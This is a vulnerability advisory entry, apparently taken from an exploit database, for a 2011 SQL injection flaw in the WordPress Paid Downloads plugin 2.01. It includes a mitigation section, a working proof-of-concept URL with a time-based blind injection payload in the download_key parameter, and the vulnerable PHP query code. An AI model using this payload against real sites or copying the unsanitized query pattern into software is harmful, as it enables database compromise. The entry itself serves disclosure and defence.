WordPress Paid Downloads plugin

vendor:

Paid Downloads

by:

Miroslav Stampar

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Paid Downloads

Affected Version From: 02.01

Affected Version To: 02.01

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:paid_downloads

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2011

WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability

The WordPress Paid Downloads plugin version 2.01 is vulnerable to a SQL injection vulnerability. This vulnerability is due to the lack of proper sanitization of user-supplied input in the download_key parameter of the download.php script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's backend database. This may allow the attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database. All input data should be validated and filtered, and special characters should be escaped or removed.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability
# Date: 2011-09-07
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/paid-downloads.2.01.zip
# Version: 2.01 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$download_key = $_GET["download_key"];
$sql = "SELECT * FROM ".$wpdb->prefix."pd_downloadlinks WHERE download_key = '".$download_key."'";
$link_details = $wpdb->get_row($sql, ARRAY_A);